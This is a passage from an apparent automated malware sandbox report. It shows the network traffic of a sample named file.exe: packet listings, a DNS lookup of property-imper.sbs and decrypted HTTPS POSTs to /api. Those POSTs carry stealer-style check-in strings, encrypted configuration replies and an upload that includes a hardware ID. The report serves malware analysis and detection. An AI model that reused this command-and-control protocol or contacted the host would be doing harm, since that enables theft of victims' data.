                                                                                    Nov 23, 2024 21:59:36.203428984 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:36.203474998 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:36.203547955 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:36.203885078 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:36.203901052 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:37.476032972 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:37.476139069 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:37.478076935 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:37.478089094 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:37.478418112 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:37.479682922 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:37.479806900 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:37.479813099 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:38.240216017 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:38.240324974 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:38.240375042 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:38.240504980 CET49744443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:38.240523100 CET44349744104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:39.091563940 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:39.091583014 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:39.091643095 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:39.091907024 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:39.091918945 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.449314117 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.449424982 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.452955008 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.452967882 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.453524113 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.462440014 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.463340044 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.463380098 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.463466883 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.463502884 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.463639021 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.463890076 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464003086 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464030981 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464147091 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464174986 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464303970 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464330912 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464342117 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464402914 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464454889 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464487076 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464512110 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464634895 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464668036 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464688063 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464716911 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.464854956 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.464905977 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:40.511332989 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:40.853204012 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:45.020200014 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:45.020344019 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:45.020497084 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:45.020739079 CET49756443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:45.020761013 CET44349756104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:45.036664009 CET49768443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:45.036691904 CET44349768104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:45.036818981 CET49768443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:45.037100077 CET49768443192.168.2.7104.21.33.116
                                                                                    Nov 23, 2024 21:59:45.037115097 CET44349768104.21.33.116192.168.2.7
                                                                                    Nov 23, 2024 21:59:46.111121893 CET49768443192.168.2.7104.21.33.116

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Nov 23, 2024 21:59:18.140677929 CET5982453192.168.2.71.1.1.1
                                                                                    Nov 23, 2024 21:59:18.386939049 CET53598241.1.1.1192.168.2.7

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 21:59:18.140677929 CET192.168.2.71.1.1.10xe7c2Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Nov 23, 2024 21:59:18.386939049 CET1.1.1.1192.168.2.70xe7c2No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                                                                                    Nov 23, 2024 21:59:18.386939049 CET1.1.1.1192.168.2.70xe7c2No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • property-imper.sbs

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749702104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:19 UTC265OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-11-23 20:59:20 UTC1015INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:20 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=4ccd4r6h8jlt7l0lie9ua6pqgk; expires=Wed, 19-Mar-2025 14:45:59 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VVxdrRarvHQOxEu3BPoIsocn%2FFtcDa9JMZPGYu3sZFhba0woKbXJ89g20r0tVrdnbX%2B6IL83bsPoqMci8Ok73WTzEdfRc1CYM7606O4DEBROlQGJuk18OP%2BXc6QmeFdUEP6%2BG8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e741519ef3f43e3-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1803&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1656267&cwnd=234&unsent_bytes=0&cid=9bb84ddfbc8f51f2&ts=718&x=0"
                                                                                    2024-11-23 20:59:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-11-23 20:59:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.749703104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:21 UTC266OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 53
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:21 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                    2024-11-23 20:59:23 UTC1012INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:23 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=qap1s6hlq53llic8q4k813hgac; expires=Wed, 19-Mar-2025 14:46:01 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G6TtO3YkvcIoAResnHIiuN2sfGhNaDVBNMh9wbJpSByD8%2BaCHidA4cGF6z0wkoFjrp61H6q%2BZ1ieekyfCGtBNgd4ekXRDWCj6x1XBZXSxDqyL2IItOcggRq5rkAmNaIALWx2fKA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8e7415271a3580d9-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1277899&cwnd=252&unsent_bytes=0&cid=659c6f350be5582e&ts=1804&x=0"
                                                                                    2024-11-23 20:59:23 UTC357INData Raw: 31 64 38 38 0d 0a 48 77 69 33 63 63 31 50 4d 65 2b 6e 59 4d 44 6f 77 43 31 70 45 6b 37 52 6a 6d 2f 79 5a 47 79 44 39 73 2b 6c 7a 33 34 45 51 31 52 6b 4b 73 46 54 39 33 73 64 7a 64 51 46 34 74 4b 30 58 78 78 33 59 76 50 76 43 39 42 65 43 75 4b 61 76 4d 44 6a 58 48 49 75 64 69 56 75 31 68 32 2b 4b 68 33 4e 77 68 6a 69 30 70 74 57 53 33 63 67 38 37 52 4e 6c 77 34 4f 34 70 71 74 78 4b 51 52 64 43 38 33 64 32 54 51 47 61 67 73 56 59 37 4c 44 61 57 4e 70 55 77 44 66 43 65 38 35 67 4c 51 53 45 37 6d 6a 4f 32 66 37 54 4e 68 4e 7a 56 53 61 63 51 61 37 7a 49 64 6c 49 55 46 72 73 72 36 44 77 68 33 4c 4c 33 6f 43 35 6b 4d 42 4f 75 53 72 4d 47 6c 44 6d 30 6c 50 48 64 71 30 78 69 69 4a 55 47 44 77 51 71 75 69 36 39 4d 53 7a 35 73 74 50 52 4e 79 45 5a 64 30 35 65 38 31
                                                                                    Data Ascii: 1d88Hwi3cc1PMe+nYMDowC1pEk7Rjm/yZGyD9s+lz34EQ1RkKsFT93sdzdQF4tK0Xxx3YvPvC9BeCuKavMDjXHIudiVu1h2+Kh3Nwhji0ptWS3cg87RNlw4O4pqtxKQRdC83d2TQGagsVY7LDaWNpUwDfCe85gLQSE7mjO2f7TNhNzVSacQa7zIdlIUFrsr6Dwh3LL3oC5kMBOuSrMGlDm0lPHdq0xiiJUGDwQqui69MSz5stPRNyEZd05e81
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 66 7a 51 6d 70 6a 37 42 45 41 6e 30 68 73 2b 45 48 6e 77 55 4f 35 70 36 6e 79 4b 63 59 61 79 77 77 66 57 71 56 58 65 38 71 53 38 32 64 51 6f 47 50 73 6b 67 48 5a 6d 36 4a 72 42 4c 65 48 30 37 6d 6d 4f 32 66 37 52 52 6a 49 6a 56 32 5a 64 59 62 70 44 39 54 6e 38 4d 50 70 35 69 6b 53 67 56 36 4c 36 48 6d 41 35 59 46 42 2b 71 64 71 4d 43 70 58 43 68 68 4d 57 55 71 6a 56 4f 4f 49 46 69 42 7a 78 57 69 79 72 30 42 45 6a 41 72 76 36 78 56 30 41 49 50 35 5a 57 70 79 61 4d 59 61 69 63 34 63 47 58 54 47 61 38 71 57 59 58 4e 41 36 2b 42 72 55 38 4f 66 53 69 31 34 41 79 56 52 6b 43 68 6b 37 57 48 39 56 78 49 4a 6a 56 76 4b 4f 41 51 6f 53 4e 55 6d 34 55 64 37 4a 50 69 53 41 63 77 64 50 50 69 43 4a 38 55 44 2f 4f 52 6f 39 57 68 47 57 41 73 4e 58 4e 71 30 42 53 69 49 31
                                                                                    Data Ascii: fzQmpj7BEAn0hs+EHnwUO5p6nyKcYaywwfWqVXe8qS82dQoGPskgHZm6JrBLeH07mmO2f7RRjIjV2ZdYbpD9Tn8MPp5ikSgV6L6HmA5YFB+qdqMCpXChhMWUqjVOOIFiBzxWiyr0BEjArv6xV0AIP5ZWpyaMYaic4cGXTGa8qWYXNA6+BrU8OfSi14AyVRkChk7WH9VxIJjVvKOAQoSNUm4Ud7JPiSAcwdPPiCJ8UD/ORo9WhGWAsNXNq0BSiI1
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 37 4a 50 69 53 41 63 77 64 50 50 67 42 4a 41 4e 42 4f 57 55 71 73 71 6f 48 32 45 69 4f 33 70 67 32 78 53 72 49 56 71 41 77 77 4b 6c 6a 71 64 64 44 6e 6b 67 76 36 78 44 30 41 45 57 6f 63 7a 74 36 4b 6f 4b 5a 51 34 31 62 47 4f 56 44 4f 45 30 45 34 72 4a 51 76 72 4b 70 55 6f 44 65 79 71 37 37 42 2b 56 43 41 58 67 6e 71 76 47 6f 42 42 67 49 54 64 39 62 4e 6b 54 71 43 70 42 6e 38 41 45 73 49 44 69 41 55 74 33 4e 50 4f 30 54 61 59 57 47 66 43 43 37 2f 4b 75 45 6d 67 6d 49 44 31 31 6d 77 72 76 4b 6c 2f 4e 6e 55 4b 70 69 71 35 49 41 33 59 6f 75 2b 4d 43 6d 52 51 50 37 5a 71 2f 77 4b 30 56 61 43 34 36 64 47 66 53 48 71 51 6e 58 6f 6e 43 41 2b 4c 45 34 6b 67 54 4d 48 54 7a 32 68 32 64 43 69 44 71 6d 4b 53 48 73 6c 4a 2f 59 54 46 78 4b 6f 31 54 71 79 46 62 68 38 6f
                                                                                    Data Ascii: 7JPiSAcwdPPgBJANBOWUqsqoH2EiO3pg2xSrIVqAwwKljqddDnkgv6xD0AEWoczt6KoKZQ41bGOVDOE0E4rJQvrKpUoDeyq77B+VCAXgnqvGoBBgITd9bNkTqCpBn8AEsIDiAUt3NPO0TaYWGfCC7/KuEmgmID11mwrvKl/NnUKpiq5IA3You+MCmRQP7Zq/wK0VaC46dGfSHqQnXonCA+LE4kgTMHTz2h2dCiDqmKSHslJ/YTFxKo1TqyFbh8o
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 6b 67 50 64 69 50 7a 6f 6b 32 58 48 6b 36 35 31 49 4c 67 6d 46 35 48 47 33 5a 69 4a 4d 78 54 71 43 45 54 31 59 55 4f 6f 59 61 71 51 41 31 35 49 4c 6e 6c 42 70 77 4e 43 75 32 64 71 4d 47 73 47 57 4d 67 4d 6e 46 67 30 78 43 73 49 6c 79 43 7a 55 4c 73 79 71 56 58 53 79 68 73 6c 76 73 47 6e 67 42 4f 2f 74 71 30 68 36 6f 51 4a 6e 6c 32 63 57 50 54 46 61 6f 68 55 6f 76 4e 42 36 71 4f 6f 30 6b 4e 63 79 4f 33 36 51 79 66 41 67 4c 76 6e 71 7a 47 6f 52 64 70 4b 6a 4d 39 4a 4a 55 55 74 32 30 4c 7a 66 51 42 74 4a 32 79 51 30 74 76 59 71 71 73 43 70 78 47 56 71 47 56 76 38 32 6e 45 6d 4d 75 4d 33 35 6c 30 68 36 70 49 56 6d 45 7a 51 53 74 67 37 42 4d 42 33 34 72 76 65 41 44 6e 51 77 4e 37 4e 54 6a 68 36 6f 45 4a 6e 6c 32 55 57 33 59 50 61 51 68 56 4d 33 61 54 4c 76 4b
                                                                                    Data Ascii: kgPdiPzok2XHk651ILgmF5HG3ZiJMxTqCET1YUOoYaqQA15ILnlBpwNCu2dqMGsGWMgMnFg0xCsIlyCzULsyqVXSyhslvsGngBO/tq0h6oQJnl2cWPTFaohUovNB6qOo0kNcyO36QyfAgLvnqzGoRdpKjM9JJUUt20LzfQBtJ2yQ0tvYqqsCpxGVqGVv82nEmMuM35l0h6pIVmEzQStg7BMB34rveADnQwN7NTjh6oEJnl2UW3YPaQhVM3aTLvK
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 68 73 36 36 77 37 6c 78 59 65 34 74 61 63 30 61 34 4b 62 53 77 36 50 58 57 62 43 75 38 71 58 38 32 64 51 71 53 46 71 30 77 45 63 53 57 2f 34 51 69 5a 41 77 2f 6e 6b 4b 66 4e 72 52 70 67 49 44 4e 33 61 64 51 5a 70 69 70 62 69 73 59 51 34 73 54 69 53 42 4d 77 64 50 50 46 43 6f 49 49 48 71 47 4c 34 39 37 74 47 32 70 68 62 6a 31 75 33 78 79 72 4b 6c 2b 4c 77 41 53 76 69 36 31 4f 43 33 38 6f 75 4f 55 4c 6b 51 73 4c 37 4a 43 2f 7a 61 59 54 61 69 67 36 63 43 71 62 55 36 67 31 45 39 57 46 4d 36 2b 45 72 45 67 64 4d 44 50 39 39 55 32 58 43 6b 36 35 31 4b 7a 4c 6f 68 39 70 49 6a 56 38 59 4d 63 42 6f 79 52 62 69 4d 6b 4a 72 49 79 77 53 51 52 35 4c 37 44 6c 43 70 67 4b 42 4f 4b 54 37 59 6e 74 47 33 35 68 62 6a 31 4a 77 67 4f 69 62 55 7a 44 33 45 4b 6c 68 75 49 58 53
                                                                                    Data Ascii: hs66w7lxYe4tac0a4KbSw6PXWbCu8qX82dQqSFq0wEcSW/4QiZAw/nkKfNrRpgIDN3adQZpipbisYQ4sTiSBMwdPPFCoIIHqGL497tG2phbj1u3xyrKl+LwASvi61OC38ouOULkQsL7JC/zaYTaig6cCqbU6g1E9WFM6+ErEgdMDP99U2XCk651KzLoh9pIjV8YMcBoyRbiMkJrIywSQR5L7DlCpgKBOKT7YntG35hbj1JwgOibUzD3EKlhuIXS
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 71 41 70 38 50 42 2b 57 63 72 73 65 70 47 47 45 6b 4e 58 46 68 30 68 43 67 4b 56 71 44 7a 41 33 69 78 4f 4a 49 45 7a 42 30 38 38 30 57 6b 77 6f 44 6f 59 76 6a 33 75 30 62 61 6d 46 75 50 57 62 62 46 71 38 6e 56 59 6e 41 42 4b 69 50 6f 6b 51 49 66 79 69 31 36 41 4b 51 44 51 66 67 6b 71 6a 4e 70 68 70 72 49 6a 42 37 4b 70 74 54 71 44 55 54 31 59 55 69 75 59 65 75 53 45 74 76 59 71 71 73 43 70 78 47 56 71 47 66 6f 63 4f 71 48 47 73 69 50 6e 68 75 33 78 61 76 4a 55 47 46 78 51 57 77 6d 4b 4a 47 44 6e 77 76 73 2b 67 4c 6d 51 41 4e 35 64 54 6a 68 36 6f 45 4a 6e 6c 32 55 47 62 53 4f 71 67 32 45 35 4b 4c 47 2b 4b 4e 72 67 39 54 4d 43 32 34 35 67 4b 64 42 51 6a 69 6e 36 6a 4e 72 42 74 75 4c 43 52 2b 5a 64 6f 58 72 79 4a 56 69 38 51 4e 70 49 32 72 54 67 4e 33 62 50
                                                                                    Data Ascii: qAp8PB+WcrsepGGEkNXFh0hCgKVqDzA3ixOJIEzB0880WkwoDoYvj3u0bamFuPWbbFq8nVYnABKiPokQIfyi16AKQDQfgkqjNphprIjB7KptTqDUT1YUiuYeuSEtvYqqsCpxGVqGfocOqHGsiPnhu3xavJUGFxQWwmKJGDnwvs+gLmQAN5dTjh6oEJnl2UGbSOqg2E5KLG+KNrg9TMC245gKdBQjin6jNrBtuLCR+ZdoXryJVi8QNpI2rTgN3bP
                                                                                    2024-11-23 20:59:23 UTC366INData Raw: 45 41 54 6d 68 4b 72 51 6f 6c 77 6f 59 54 6b 39 4d 75 78 54 70 69 70 49 6e 4e 4d 50 73 6f 33 69 63 45 55 77 4e 50 4f 30 54 61 55 46 41 4f 2b 54 75 39 62 67 4f 33 41 72 4d 57 31 74 77 68 7a 76 59 78 4f 4c 68 56 72 78 78 4f 4a 4c 47 6a 42 30 34 37 35 57 78 56 56 5a 73 63 61 79 69 62 52 63 63 47 46 75 4c 79 53 56 41 65 39 31 45 38 72 47 45 4c 43 4d 6f 56 6b 49 4e 78 4b 4e 79 78 65 64 41 42 6e 77 71 70 50 41 74 78 46 67 4e 69 63 78 66 39 59 64 6f 53 70 46 7a 59 74 43 72 63 72 36 64 6b 73 34 62 49 79 69 54 59 68 47 56 71 47 68 72 73 6d 6a 47 33 41 77 65 31 70 77 32 42 57 34 50 42 50 44 68 51 54 69 30 76 49 42 53 33 51 39 38 37 52 64 77 6c 31 62 73 73 50 39 6c 62 4a 53 66 32 45 67 50 54 4b 48 58 65 38 2f 45 39 57 46 52 61 47 59 73 45 6b 49 5a 69 2f 30 30 6a 4f
                                                                                    Data Ascii: EATmhKrQolwoYTk9MuxTpipInNMPso3icEUwNPO0TaUFAO+Tu9bgO3ArMW1twhzvYxOLhVrxxOJLGjB0475WxVVZscayibRccGFuLySVAe91E8rGELCMoVkINxKNyxedABnwqpPAtxFgNicxf9YdoSpFzYtCrcr6dks4bIyiTYhGVqGhrsmjG3Awe1pw2BW4PBPDhQTi0vIBS3Q987Rdwl1bssP9lbJSf2EgPTKHXe8/E9WFRaGYsEkIZi/00jO
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 32 36 65 34 0d 0a 46 49 37 58 45 4b 53 4a 74 45 78 4d 54 68 4b 77 2b 67 43 66 44 51 2f 66 71 6f 50 4b 72 42 39 6f 59 77 64 72 5a 38 55 51 71 69 70 74 73 38 73 46 74 6f 32 73 53 51 73 77 59 76 50 6a 54 63 67 2f 54 71 6e 55 6b 6f 6e 74 42 43 5a 35 64 6b 68 70 32 78 32 6f 4f 30 4c 41 35 68 53 76 68 61 6c 4f 53 7a 35 73 74 61 78 56 77 45 68 4f 35 59 58 74 6e 2f 31 4f 50 58 52 6c 4b 6a 71 48 44 4f 45 30 45 35 75 46 57 76 44 45 34 6c 31 4c 4b 47 7a 30 34 67 43 52 42 51 44 69 68 72 2f 42 72 67 70 6c 5a 67 68 44 53 39 67 59 6f 79 42 63 68 76 73 38 67 34 65 70 51 77 5a 2f 4a 34 33 53 47 4a 4d 49 41 4f 61 43 76 49 66 6a 58 47 6c 68 62 6b 51 71 6e 56 4f 51 59 78 4f 56 68 56 72 69 76 36 46 42 42 58 63 36 6f 71 45 73 6e 51 30 43 37 4a 75 6d 68 2b 4e 63 59 47 46 75 4c
                                                                                    Data Ascii: 26e4FI7XEKSJtExMThKw+gCfDQ/fqoPKrB9oYwdrZ8UQqipts8sFto2sSQswYvPjTcg/TqnUkontBCZ5dkhp2x2oO0LA5hSvhalOSz5staxVwEhO5YXtn/1OPXRlKjqHDOE0E5uFWvDE4l1LKGz04gCRBQDihr/BrgplZghDS9gYoyBchvs8g4epQwZ/J43SGJMIAOaCvIfjXGlhbkQqnVOQYxOVhVriv6FBBXc6oqEsnQ0C7Jumh+NcYGFuL
                                                                                    2024-11-23 20:59:23 UTC1369INData Raw: 52 43 45 53 4f 31 51 53 68 74 4a 78 6b 42 33 59 72 71 65 73 4c 74 69 5a 4f 72 39 53 69 68 2f 55 6c 4a 6d 6c 32 51 69 53 56 43 2b 39 31 45 37 6a 47 44 4b 79 4e 74 46 35 47 56 54 75 77 2f 41 75 54 52 6b 43 68 6b 75 32 66 2f 56 49 6d 4a 53 63 39 4d 6f 56 42 39 48 67 41 32 70 56 51 76 63 53 37 44 78 30 77 64 4f 47 69 54 59 4a 47 56 71 48 54 72 74 57 2f 47 6d 55 33 4e 54 70 55 36 7a 57 73 50 46 6d 73 79 42 4b 6c 74 4a 78 61 43 48 34 69 74 50 6f 63 30 45 68 4f 37 74 54 31 2f 75 31 55 4b 69 63 31 61 79 72 71 58 65 38 31 45 39 57 46 4e 36 47 45 72 45 67 64 59 57 47 56 37 78 79 61 4a 77 50 78 6b 2b 32 4a 37 52 6f 6d 65 57 55 7a 4b 74 45 43 37 33 55 44 33 35 35 58 38 64 33 79 48 52 51 2b 4e 66 50 36 54 63 68 55 51 4b 47 47 37 5a 2f 74 57 32 55 7a 4a 48 74 70 77 78
                                                                                    Data Ascii: RCESO1QShtJxkB3YrqesLtiZOr9Sih/UlJml2QiSVC+91E7jGDKyNtF5GVTuw/AuTRkChku2f/VImJSc9MoVB9HgA2pVQvcS7Dx0wdOGiTYJGVqHTrtW/GmU3NTpU6zWsPFmsyBKltJxaCH4itPoc0EhO7tT1/u1UKic1ayrqXe81E9WFN6GErEgdYWGV7xyaJwPxk+2J7RomeWUzKtEC73UD355X8d3yHRQ+NfP6TchUQKGG7Z/tW2UzJHtpwx


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.749714104.21.33.1164437400C:\Users\user\Desktop\file.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-11-23 20:59:25 UTC280OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=CO639FFAT00100
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 12826
                                                                                    Host: property-imper.sbs
                                                                                    2024-11-23 20:59:25 UTC12826OUTData Raw: 2d 2d 43 4f 36 33 39 46 46 41 54 30 30 31 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 32 43 32 35 35 33 38 38 33 44 39 41 32 42 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 43 4f 36 33 39 46 46 41 54 30 30 31 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 43 4f 36 33 39 46 46 41 54 30 30 31 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 43 4f
                                                                                    Data Ascii: --CO639FFAT00100Content-Disposition: form-data; name="hwid"E32C2553883D9A2BD7CBBD6DF28D3732--CO639FFAT00100Content-Disposition: form-data; name="pid"2--CO639FFAT00100Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--CO
                                                                                    2024-11-23 20:59:26 UTC1017INHTTP/1.1 200 OK
                                                                                    Date: Sat, 23 Nov 2024 20:59:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
